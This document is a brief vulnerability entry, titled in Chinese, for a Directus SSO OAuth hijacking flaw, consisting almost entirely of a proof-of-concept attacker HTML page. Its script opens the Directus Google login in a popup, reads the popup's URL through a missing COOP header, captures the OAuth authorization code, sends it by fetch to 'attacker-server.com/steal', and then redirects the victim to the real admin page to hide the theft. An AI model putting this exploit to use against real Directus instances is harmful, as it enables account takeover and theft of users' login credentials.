CVE-2026-35408 Directus SSO OAuth劫持漏洞

<!-- Attacker Page: exploit.html --> <!DOCTYPE html> <html> <head> <title>Wait for redirect...</title> </head> <body> <h2>Please wait while we redirect you...</h2> <script> // The target Directus SSO URL const targetUrl = 'https://target-directus-instance.com/auth/login/google'; // Open the Directus SSO page in a new window // Due to missing COOP header, this window remains accessible const openedWindow = window.open(targetUrl, 'DirectusLogin', 'width=500,height=600'); // Polling loop to check if the window has been redirected back to Directus const checkInterval = setInterval(() => { try { // Check if the window is closed if (openedWindow.closed) { clearInterval(checkInterval); return; } // Access the URL of the opened window (Possible because of missing COOP) const currentUrl = openedWindow.location.href; // Look for the authorization code or state in the URL if (currentUrl.includes('code=')) { console.log('Authorization Code intercepted:', currentUrl); // Send the intercepted URL to the attacker's server fetch('https://attacker-server.com/steal', { method: 'POST', body: JSON.stringify({ url: currentUrl }) }); // Close the window and clear interval openedWindow.close(); clearInterval(checkInterval); // Redirect victim to legitimate site to avoid suspicion window.location.href = 'https://target-directus-instance.com/admin'; } } catch (e) { // Access might be blocked if COOP was present, but here it is not console.log('Waiting for user interaction...'); } }, 1000); </script> </body> </html>